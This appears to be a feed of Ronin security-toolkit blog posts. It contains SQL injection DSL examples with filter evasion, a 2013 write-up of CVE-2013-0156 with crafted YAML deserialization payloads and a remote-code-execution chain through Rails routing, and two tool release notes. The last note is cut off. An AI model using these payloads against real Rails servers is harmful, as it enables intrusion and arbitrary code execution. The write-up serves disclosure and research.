&#39;1&#39;=&#39;1</span> </code></pre></div> <p>Columns:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">and</span> <span class="p">{</span> <span class="n">admin</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 AND admin=1</span> </code></pre></div> <p>Clauses:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span><span class="o">.</span><span class="n">limit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 AND admin=1</span> </code></pre></div> <p>Statements:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span> <span class="c1"># 1 UNION SELECT (1,2,3,4,id) FROM users</span> </code></pre></div> <p>Filter evasion:</p> <div class="highlight"><pre><code class="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:SQL</span><span class="o">::</span><span class="no">Injection</span><span class="o">.</span><span class="n">new</span> <span class="n">sqli</span><span class="o">.</span><span class="n">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span> <span class="nb">puts</span> <span class="n">sqli</span><span class="o">.</span><span class="n">to_sql</span><span class="p">(</span><span class="ss">:space</span> <span class="o">=&gt;</span> <span class="s1">&#39;/**/&#39;</span><span class="p">)</span> <span class="c1"># 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users</span> </code></pre></div> Wed Jan 09 00:00:00 -0800 2013 postmodern http://ronin-ruby.gihtub.io/blog/2013/01/09/rails-pocs.html <p><strong>TL;DR:</strong> Exploits are out, update Rails!</p> <ul> <li><a href="https://gist.github.com/4499017">rails_dos.rb</a></li> <li><a href="https://gist.github.com/4499030">rails_jsonq.rb</a></li> <li><a href="https://gist.github.com/4499032">rails_sqli.rb</a></li> <li><a href="https://gist.github.com/4499206">rails_rce.rb</a></li> </ul> <p>On January 8th, Aaron Patterson announced <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>, multiple vulnerabilities in parameter parsing in Action Pack allowing attackers to:</p> <ul> <li>Bypass Authentication systems</li> <li>Inject Arbitrary SQL</li> <li>Perform a Denial of Service (DoS)</li> <li>Execute arbitrary code</li> </ul> <p>However, rumors of this vulnerability had been circulating on twitter as far back as <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a>. Others also claimed to have <a href="www.reddit.com/r/netsec/comments/167c11/serious_vulnerability_in_ruby_on_rails_allowing/c7teov4">working PoC exploits</a>, but would not release them for fear of the PoCs being used maliciously. Naturally, I was interested in investigating the vulnerability.</p> <p>It all started when <a href="http://phenoelit.org/blog/archives/2012/12/21/let_me_github_that_for_you/index.html">Phenoelit</a> discovered a vulnerability in how authentication plugins (such as AuthLogic) pass parameters to <code>find_by_*</code> methods. <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a> was then posted, stirring Twitter into a frenzy. However, the possibility of exploitation was limited, as detailed on the <a href="http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/">Phusion Corporate Blog</a>. Thus the hunt began.</p> <h2>Intro to params in Rails</h2> <p>Params are first parsed by <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ActionDispatch::Middleware::ParamsParser</a>, which detects the MIME type of the request and parses the body appropriately. By default <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ParamsParser</a> only supports parsing XML and JSON requests. After the request body is parsed, the resulting data is coerced into a <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a>, ensuring all Hash keys are Strings.</p> <p>Next, <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/http/parameters.rb">ActionDispatch::Http::Parameters</a> takes the parsed request parameters and merges them with the path parameters. Note that the path parameters are first merged into the request parameters, to ensure that the request parameters cannot override the path parameters. Also note that when a Hash is merged into a <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a>, all keys are converted to Strings and all sub-Hashes converted to Indifferent ones. This ensures that <code>params</code> contains no Symbol keys and cannot be passed to <code>find_by_*</code> methods; despite what <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a> claims.</p> <h2>XML Deserialization</h2> <p>The Rails XML module (<a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/xml_mini.rb#L67">ActiveSupport::XmlMini</a>) supports deserializing various primitives such as Integer, Symbol, String, Date, Time, etc. However, <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/xml_mini.rb#L67">XmlMini</a> also supports deserializing embedded YAML blobs. One might wonder, why this would be a good idea? Apparently, to support <a href="http://web.archive.org/web/20071218105822/http://dev.rubyonrails.org/ticket/7502">serializing/deserializing ActiveRecord models that contain serialized YAML</a>.</p> <p>What can we do with this? Deserialize arbitrary Objects for Classes already loaded by the Rails application.</p> <h2>YAML</h2> <p>When <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> parses <code>!ruby/object:MyClass</code> objects, it will call <code>MyClass.allocate</code> which returns a blank uninitialized instances of <code>MyClass</code>. Next, Psych will call <code>instance_variable_set</code> to set various instance variables.</p> <p>Interestingly, <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> allows for arbitrary classes to be specified with <code>!ruby/string</code> and <code>!ruby/hash</code> declarations:</p> <div class="highlight"><pre><code class="yaml"><span class="kt">!ruby</span><span class="l-Scalar-Plain">/hash:MyHashLikeClass</span> <span class="l-Scalar-Plain">key1</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">value1</span> <span class="l-Scalar-Plain">key2</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">value2</span> </code></pre></div> <p>When <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> parses <code>!ruby/hash:Class</code>, it will actually call <code>#initialize</code> and then call <code>#[]=</code> to populate the objects fields. This feature was <a href="https://github.com/ruby/ruby/commit/8cd2bf072180a9f733ac06dbaa96f071ca8e8303">added</a> sometime after Ruby 1.9.2.</p> <h2>PoCs</h2> <p>The Proof of Concept (PoC) exploits rely on abusing the <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> YAML parser and how it allows specifying arbitrary classes for <code>!ruby/string</code> and <code>!ruby/hash</code> YAML objects.</p> <p>All of the following PoCs require the <a href="https://rubygems.org/gems/ronin-support">ronin-support</a> gem and licensed under <a href="http://gplv3.fsf.org/">GPLv3</a>.</p> <h3>Symbol DoS</h3> <p><a href="https://gist.github.com/4499017">rails_dos.rb</a></p> <p>The Denial of Service vulnerability relies on the fact that even in Ruby 1.9 Symbols are not Garbage Collected. Even if <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a> converts the Symbols to Strings, the Symbols will remain in memory.</p> <p>All we have to do is repeatedly send requests containing unique Symbols. To accomplish this we use the <a href="/docs/ronin-support/String.html#generate-class_method">String.generate</a> method to generate alphabetic Symbol names of varying length.</p> <h3>Unsafe Query Generation via JSON</h3> <p><a href="https://gist.github.com/4499030">rails_jsonq.rb</a></p> <p><a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ActionDispatch::Middleware::ParamsParser</a> also supports parsing JSON params from requests. However, it does not normalize the parsed params. Values such as <code>[nil]</code> or <code>[""]</code> are not normalized to <code>nil</code> and <code>""</code>. This allows us to bypass <code>#nil?</code> or <code>#empty?</code> checks, such as described in <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/t1WFuuQyavI">CVE-2013-0155</a>:</p> <div class="highlight"><pre><code class="ruby"><span class="k">unless</span> <span class="n">params</span><span class="o">[</span><span class="ss">:token</span><span class="o">].</span><span class="n">nil?</span> <span class="n">user</span> <span class="o">=</span> <span class="no">User</span><span class="o">.</span><span class="n">find_by_token</span><span class="p">(</span><span class="n">params</span><span class="o">[</span><span class="ss">:token</span><span class="o">]</span><span class="p">)</span> <span class="n">user</span><span class="o">.</span><span class="n">reset_password!</span> <span class="k">end</span> </code></pre></div> <h3>SQL Injection</h3> <p><a href="https://gist.github.com/4499032">rails_sqli.rb</a></p> <p>Knowing that we cannot simply craft a XML+YAML request containing the <code>:select</code> option with some raw SQL, we have to look for an alternate code-path. As the <a href="http://www.insinuator.net/2013/01/rails-yaml/">Insinuator</a> blog post points out, <code>find_by_*</code> methods can actually accept <code>Arel::Node</code> objects! Potentially, we can inject any of the <a href="https://github.com/rails/arel/tree/v3.2.10/lib/arel/nodes">Arel::Nodes</a>. The most promising of these is <a href="https://github.com/rails/arel/blob/v3.2.10/lib/arel/nodes/sql_literal.rb">Arel::Nodes::SqlLiteral</a>. Unfortunately, calling <code>Arel::Nodes::SqlLiteral#to_yaml</code> does not work, so we must hand craft specific YAML:</p> <div class="highlight"><pre><code class="yaml"><span class="nn">---</span> <span class="kt">!ruby</span><span class="l-Scalar-Plain">/string:Arel::Nodes::SqlLiteral &quot;SQL here&quot;</span> </code></pre></div> <p>Note that since <a href="https://github.com/rails/arel/blob/v3.2.10/lib/arel/nodes/sql_literal.rb">Arel::Nodes::SqlLiteral</a> inherits from String, <code>!ruby/object:Arel::Nodes::SqlLiteral</code> actually deserializes to a plain String; thus <code>!ruby/string</code> is necessary.</p> <p>We could get creative and inject in an Abstract Syntax Tree (AST) of our desired SQL:</p> <div class="highlight"><pre><code class="yaml"><span class="nn">---</span> <span class="kt">!ruby</span><span class="l-Scalar-Plain">/object:Arel::Nodes::Or</span> <span class="l-Scalar-Plain">left</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">0</span> <span class="l-Scalar-Plain">right</span><span class="p-Indicator">:</span> <span class="kt">!ruby</span><span class="l-Scalar-Plain">/object:Arel::Nodes::Equality</span> <span class="l-Scalar-Plain">left</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">1</span> <span class="l-Scalar-Plain">right</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">1</span> </code></pre></div> <h3>Remote Code Execution</h3> <p><a href="https://gist.github.com/4499206">rails_rce.rb</a></p> <p><strong>Update:</strong> The RCE PoC has been updated to support Rails 3.x and 2.x. Also, <a href="https://gist.github.com/4499206/#comment-718470">@eric1234</a> discovered that RCE PoC will not work against Ruby 1.9.2 below, due to Psych &lt;= 1.0.0 not allowing arbitrary classes with <code>!ruby/hash</code>. However, there may be other YAML encoding tricks that could trigger the vulnerability.</p> <p>As discussed in this <a href="http://www.insinuator.net/2013/01/rails-yaml/">Insinuator</a> blog post, it may be possible to override an instance variable that is later passed to <code>instance_eval</code>, <code>class_eval</code>, <code>module_eval</code> or <code>send</code>. One such example is using <a href="http://rubydoc.info/stdlib/erb/ERB">ERB</a>:</p> <div class="highlight"><pre><code class="yaml"><span class="nn">---</span> <span class="kt">!ruby</span><span class="l-Scalar-Plain">/object:ERB</span> <span class="l-Scalar-Plain">src</span><span class="p-Indicator">:</span> <span class="l-Scalar-Plain">_erbout = puts &#39;lol&#39;</span> </code></pre></div> <p>However, this relies on Rails calling <code>#run</code> or <code>#result</code>. This turns out to be rather difficult, since ActiveRecord/Arel will only allow certain types of objects be passed to <code>find_by_*</code> methods.</p> <p>Since, we know <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> will call <code>#initialize</code> when parsing <code>!ruby/hash:MyClass</code> we just need to find a Hash like class. Luckily an anonymous contributor discovered such a class and told the Metasploit developers, which got published on the <a href="https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156">Rapid7 Community</a> blog. The blog post then circulated Twitter and a friend pointed me to the class.</p> <p><strong>Update:</strong> After publishing the PoCs, <a href="https://github.com/lian">lian</a> contacted me and identified himself as the anonymous contributor who told HD Moore about the class. I then convinced him to take credit for his work on this vulnerability. Thanks to <a href="https://github.com/lian">lian</a>'s solution, I was able to finish writing the exploit. In my opinion, if you give a famous Security Research your own research, you should publish it yourself to receive proper recognition and inform us not-so-famous Security researchers. ;)</p> <p>The class in question is <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/routing/route_set.rb#L96">ActionDispatch::Routing::RouteSet::NamedRouteCollection</a>. The class initializes variables in <code>#initialize</code> and aliases <code>#[]=</code> to the <code>add</code> method. The <code>add</code> method then leads to <code>define_named_route_methods</code>, which leads to <code>define_named_route_methods</code>, then to <code>define_url_helper</code> and finally <code>module_eval</code>. We are in business.</p> <p>Now to figure out how to escape our Ruby code, such that <code>def #{name}</code> is ignored. Luckily, Ruby provides a special keyword (<code>__END__</code>) which causes the remainder of Ruby code to be treated as inline data.</p> <div class="highlight"><pre><code class="ruby"><span class="n">code</span> <span class="o">=</span> <span class="s2">&quot;puts &#39;lol&#39;&quot;</span> <span class="n">escaped_code</span> <span class="o">=</span> <span class="s2">&quot;foo; </span><span class="si">#{</span><span class="n">code</span><span class="si">}</span><span class="se">\n</span><span class="s2">__END__</span><span class="se">\n</span><span class="s2">&quot;</span> </code></pre></div> <p>Now we need a convincing <code>route</code> Object for <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/routing/route_set.rb#L187-L203">define_url_helper</a>. Inspecting the method, our <code>route</code> must respond to <code>defaults</code>, <code>requirements</code>, <code>required_parts</code>, <code>segment_keys</code>. Luckily, all of these methods appear to be reader methods, so we can mock up a <code>route</code> using an <a href="http://rubydoc.info/stdlib/ostruct/OpenStruct">OpenStruct</a>.</p> <p>After some massaging of the YAML, victory! In fact, our method worked so well that no exceptions were raised and our code is evaluated for each url helper that is defined (four times):</p> <pre><code>lol lol lol lol Started POST "/secrets/search" for 127.0.0.1 at 2013-01-09 19:35:48 -0800 Processing by SecretsController#search as */* Parameters: {"secret"=&gt;#&lt;ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x007f5474264218 @routes={:"foo; puts 'lol'\n__END__\n"=&gt;#&lt;OpenStruct defaults={:action=&gt;"create", :controller=&gt;"foos"}, required_parts=[], requirements={:action=&gt;"create", :controller=&gt;"foos"}, segment_keys=[:format]&gt;}, @helpers=[:"hash_for_foo; puts 'lol'\n__END__\n_url", :"foo; puts 'lol'\n__END__\n_url", :"hash_for_foo; puts 'lol'\n__END__\n_path", :"foo; puts 'lol'\n__END__\n_path"], @module=#&lt;Module:0x007f54742641a0&gt;&gt;} WARNING: Can't verify CSRF token authenticity Completed 500 Internal Server Error in 1ms </code></pre> Mon Oct 08 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/10/08/ronin-scanners-1-0-0-pre1-released.html <p>After much stressing over API design and refactoring <a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> 1.0.0.pre1 has been released. <a href="https://rubygems.org/gems/ronin-scanners/versions/1.0.0.pre1">1.0.0.pre1</a> is a complete rewrite of ronin-scanners when compared to <a href="https://rubygems.org/gems/ronin-scanners/versions/0.1.4">0.1.4</a>; released back in 2009. The new API for <a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> now allows for developers to write Scanners in Ruby and have their results automatically imported into the Ronin Database! This new API opens the door for quickly pulling data off the internet and into Ronin.</p> <h2>Install</h2> <p><a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> 1.0.0.pre1 can be installed from <a href="https://rubygems.org/gems/ronin-scanners/versions/1.0.0.pre1">rubygems.org</a> like so:</p> <pre><code>$ gem install ronin-scanners --pre </code></pre> <h2>API</h2> <p>All Ronin Scanners inherit from the <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html">Ronin::Scanners::Scanner</a> base class.</p> <p>For a Scanner to be a functioning scanner, it must define a <code>scan</code> method. The <code>scan</code> method performs the actual "scanning" and yields each result. A result from a Scanner can be any kind of Object; whatever makes the most sense for a particular Scanner.</p> <div class="highlight"><pre><code class="ruby"><span class="k">def</span> <span class="nf">scan</span> <span class="n">sitemap</span> <span class="o">=</span> <span class="ss">Nokogiri</span><span class="p">:</span><span class="ss">:XML</span><span class="p">(</span><span class="n">http_get_body</span><span class="p">(</span><span class="ss">:path</span> <span class="o">=&gt;</span> <span class="no">SITEMAP_PATH</span><span class="p">))</span> <span class="n">sitemap</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s1">&#39;/urlset/url/loc/.&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">url</span><span class="o">|</span> <span class="k">yield</span> <span class="n">url</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <h3>Parameters</h3> <p>Since the <code>scan</code> method takes no arguments, Scanners are configured by the parameters they define.</p> <div class="highlight"><pre><code class="ruby"><span class="c1"># The URL to start spidering at.</span> <span class="n">parameter</span> <span class="ss">:start_at</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=&gt;</span> <span class="s1">&#39;The URI to start scanning at&#39;</span> <span class="c1"># The hosts to spider.</span> <span class="n">parameter</span> <span class="ss">:hosts</span><span class="p">,</span> <span class="ss">:default</span> <span class="o">=&gt;</span> <span class="no">Set</span><span class="o">[]</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=&gt;</span> <span class="s1">&#39;The hosts to scan&#39;</span> </code></pre></div> <h3>Results</h3> <p>Many Scanners will likely invoke third-party scanners, and the returned results may not always be so consistent. For this, one can define a <code>normalize_result</code> method:</p> <div class="highlight"><pre><code class="ruby"><span class="k">def</span> <span class="nf">normalize_result</span><span class="p">(</span><span class="n">result</span><span class="p">)</span> <span class="k">unless</span> <span class="n">result</span><span class="o">.</span><span class="n">kind_of?</span><span class="p">(</span><span class="o">::</span><span class="ss">URI</span><span class="p">:</span><span class="ss">:Generic</span><span class="p">)</span> <span class="k">begin</span> <span class="no">URI</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">result</span><span class="o">.</span><span class="n">to_s</span><span class="p">)</span> <span class="k">rescue</span> <span class="ss">URI</span><span class="p">:</span><span class="ss">:InvalidURIError</span><span class="p">,</span> <span class="ss">URI</span><span class="p">:</span><span class="ss">:InvalidComponentError</span> <span class="k">end</span> <span class="k">else</span> <span class="n">result</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <p>If <code>normalize_result</code> returns <code>nil</code>, the result is considered invalid and ignored.</p> <h3>Resources</h3> <p>In order for a Scanner to import results into the Database, it must define a <code>new_resource</code> method. The <code>new_resource</code> method takes a Scanner result and converts it into a Database Resource, which can later be saved into the Database.</p> <div class="highlight"><pre><code class="ruby"><span class="k">def</span> <span class="nf">new_resource</span><span class="p">(</span><span class="n">result</span><span class="p">)</span> <span class="no">IPAddress</span><span class="o">.</span><span class="n">first_or_new</span><span class="p">(</span><span class="ss">:address</span> <span class="o">=&gt;</span> <span class="n">result</span><span class="p">)</span> <span class="k">end</span> </code></pre></div> <p>Depending on which Scanner base-class one inherits from (ex: <a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">URLScanner</a>), a <code>new_resource</code> method may already be defined.</p> <h3>Methods</h3> <p>The <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html">Scanner</a> base class defines three methods for enumerating over Scanner results:</p> <ol> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-instance_method">each</a> - The primary enumerator method, which simply calls <code>scan</code> and yields the Scanner results.</li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each_resource-instance_method">each_resource</a> - Simply calls <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-instance_method">each</a> and converts each Scanner result into a Database Resource object via the <code>new_resource</code> method.</li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#import-instance_method">import</a> - Simply calls <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each_resource-instance_method">each_resource</a>, saves each new Database Resource returned by <code>new_resource</code> and yields the successfully saved Resources.</li> </ol> <p>For convenience sake, <a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">Scanner</a> also define class-methods for <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-class_method">each</a>, <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#scan-class_method">scan</a> and <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#import-class_method">import</a>.</p> <div class="highlight"><pre><code class="ruby"><span class="ss">Ronin</span><span class="p">:</span><span class="ss">:Scanners</span><span class="o">::</span><span class="no">Spider</span><span class="o">.</span><span class="n">import</span><span class="p">(</span><span class="ss">:hosts</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;www.example.com&#39;</span><span class="o">]</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">url</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;Scanned </span><span class="si">#{</span><span class="n">url</span><span class="si">}</span><span class="s2">&quot;</span> <span class="k">end</span> </code></pre></div> <h2>Classes</h2> <p><a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> provides various Scanner base-classes:</p> <ul> <li><a href="/docs/ronin-scanners/Ronin/Scanners/IPScanner.html">Ronin::Scanners::IPScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/HostNameScanner.html">Ronin::Scanners::HostNameScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/TCPPortScanner.html">Ronin::Scanners::TCPPortScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/UDPPortScanner.html">Ronin::Scanners::UDPPortScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">Ronin::Scanners::URLScanner</a></li> </ul> <p><a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> also provides several built-in Scanners:</p> <ul> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Dork.html">Ronin::Scanners::Dork</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/ResolvScanner.html">Ronin::Scanners::ResolvScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/ReverseLookupScanner.html">Ronin::Scanners::ReverseLookupScanner</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/SiteMap.html">Ronin::Scanners::SiteMap</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Spider.html">Ronin::Scanners::Spider</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Nmap.html">Ronin::Scanners::Nmap</a></li> <li><a href="/docs/ronin-scanners/Ronin/Scanners/Proxies.html">Ronin::Scanners::Proxies</a></li> </ul> <h2>Commands</h2> <p><a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> provides several commands for the built-in Scanners:</p> <ul> <li><code>$ ronin scanners</code> - Starts the Ronin Console with ronin-scanners loaded.</li> <li><code>$ ronin scanner</code> - Loads a Scanner from a file or from the Database and runs it.</li> <li><code>$ ronin scan:dork</code> - Performs Google Dorks.</li> <li><code>$ ronin scan:nmap</code> - Automates nmap scans and imports them into the Database.</li> <li><code>$ ronin scan:proxies</code> - Scans for proxies and imports them into the Database.</li> <li><code>$ ronin scan:spider</code> - Spiders a website and saves URLs into the Database.</li> </ul> <h2>How to Help</h2> <p>Since this is a pre-release <em>and</em> a complete rewrite of <a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a>, your help is greatly needed! Here's how you can help out:</p> <ol> <li>Install it (<code>$ gem install ronin-scanners --pre</code>)</li> <li>Test the commands</li> <li>Review the <a href="/docs/ronin-scanners/frames">documentation</a></li> <li>Attempt to write a <a href="https://gist.github.com/3803087">script</a> which uses one of the Scanners</li> <li>Submit bugs or suggestions on <a href="https://github.com/ronin-ruby/ronin-scanners/issues?direction=desc&amp;sort=created&amp;state=open">GitHub</a></li> </ol> <p>Let's make <a href="https://github.com/ronin-ruby/ronin-scanners#readme">ronin-scanners</a> 1.0.0 a solid release!</p> Sat Jun 16 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/06/16/ronin-1.5.0-released.html <p><a href="/docs/ronin-support/file.ChangeLog.html">ronin-support 0.5.0</a>, <a href="/docs/ronin/file.ChangeLog.html">ronin 1.5.0</a> and <a href="/docs/ronin-gen/file.ChangeLog.html">ronin-gen 1.2.0</a> have finally been released!</p> <pre><code>$ gem install ronin-support ronin ronin-gen </code></pre> <h2>Checksums</h2> <ul> <li><a href="https://rubygems.org/downloads/ronin-support-0.5.0.gem">ronin-support-0.5.0.gem</a> <ul> <li><strong>MD5:</strong> <code>98594570d14c37101abdfdba32c6505f</code></li> <li><strong>SHA1:</strong> <code>9c505fa3bdb5d38831acfb10ea2989f214db517d</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin-support/ronin-support-0.5.0.gem.asc">PGP</a></li> </ul> </li> <li><a href="https://rubygems.org/downloads/ronin-1.5.0.gem">ronin-1.5.0.gem</a> <ul> <li><strong>MD5:</strong> <code>1bfa9fc2709cc98231abf6944780ab63</code></li> <li><strong>SHA1:</strong> <code>320659d87280d0a99075481ae7a05aa8bad4fff9</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin/ronin-1.5.0.gem.asc">PGP</a></li> </ul> </li> <li><a href="https://rubygems.org/downloads/ronin-gen-1.2.0.gem">ronin-gen-1.2.0.gem</a> <ul> <li><strong>MD5:</strong> <code>d3a3ea9c59f73abb274be8705160f1a2</code></li> <li><strong>SHA1:</strong> <code>f4a186f9772c2b8bf6807192a0740f3148c81e71</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin-gen/ronin-gen-1.2.0.gem.asc">PGP</a></li> </ul> </li> </ul> <h2>Whats New?</h2> <h3>pack / unpack</h3> <p>Special <code>pack</code> / <code>unpack</code> methods were added to <a href="">String</a>, <a href="/docs/ronin-support/Integer.html#pack-instance_method">Integer</a>, <a href="/docs/ronin-support/Float.html#pack-instance_method">Float</a> and <a href="/docs/ronin-support/Array.html#pack-instance_method">Array</a> classes. Unlike the normal <a href="http://rubydoc.info/stdlib/core/Array#pack-instance_method">Array#pack</a> / <a href="http://rubydoc.info/stdlib/core/String#unpack-instance_method">String#unpack</a> methods, these methods accept C-types:</p> <div class="highlight"><pre><code class="ruby"><span class="o">[</span><span class="mh">0x5</span><span class="p">,</span> <span class="s2">&quot;hello&quot;</span><span class="o">].</span><span class="n">pack</span><span class="p">(</span><span class="ss">:uint16_be</span><span class="p">,</span> <span class="ss">:string</span><span class="p">)</span> <span class="c1"># =&gt; &quot;\x00\x05hello\x00&quot;</span> </code></pre></div> <p>You can even specify the lengths of fields with <a href="/docs/ronin-support/Array.html#pack-instance_method">Array#pack</a> and</p> <div class="highlight"><pre><code class="ruby"><span class="o">[</span><span class="mh">0x1</span><span class="p">,</span> <span class="mh">0x2</span><span class="p">,</span> <span class="mh">0x3</span><span class="p">,</span> <span class="mh">0x4</span><span class="p">,</span> <span class="s2">&quot;hello&quot;</span><span class="o">].</span><span class="n">pack</span><span class="p">(</span><span class="o">[</span><span class="ss">:uint8</span><span class="p">,</span> <span class="mi">4</span><span class="o">]</span><span class="p">,</span> <span class="ss">:string</span><span class="p">)</span> <span class="c1"># =&gt; &quot;\x01\x02\x03\x04hello\x00&quot;</span> </code></pre></div> <p>For a complete list of supported types, please see the documentation for <a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a>.</p> <h3>Binary::Template</h3> <p>The way we implemented the fancy <code>pack</code> / <code>unpack</code> methods, was to create a template (<a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a>) which translates C-types to Ruby <a href="http://rubydoc.info/stdlib/core/Array#pack-instance_method">pack codes</a>. Using <a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a> you can create reusable binary templates for packing and 